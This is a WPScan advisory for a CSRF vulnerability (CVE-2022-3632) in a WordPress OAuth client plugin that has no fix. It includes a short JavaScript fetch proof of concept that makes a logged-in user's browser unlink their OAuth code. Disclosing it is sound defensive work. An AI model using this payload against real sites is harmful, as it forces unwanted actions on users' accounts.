WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

OAuth Client by DigitialPixies <= 1.1.0 - CSRF

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions.

Proof of Concept

Make a logged in user visit a page with the following code

fetch('https://example.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=dpt-oauth-ajax&call=unlink_auth_code',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

dpt-oauth-client
No known fix - plugin closed

References

CVE
CVE-2022-3632

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified

Yes

WPVDB ID
4c1b0e5e-245a-4d1f-a561-e91af906e62d

Timeline

Publicly Published

2022-10-21 (about 3 months ago)

Added

2022-10-21 (about 3 months ago)

Last Updated

2022-10-21 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin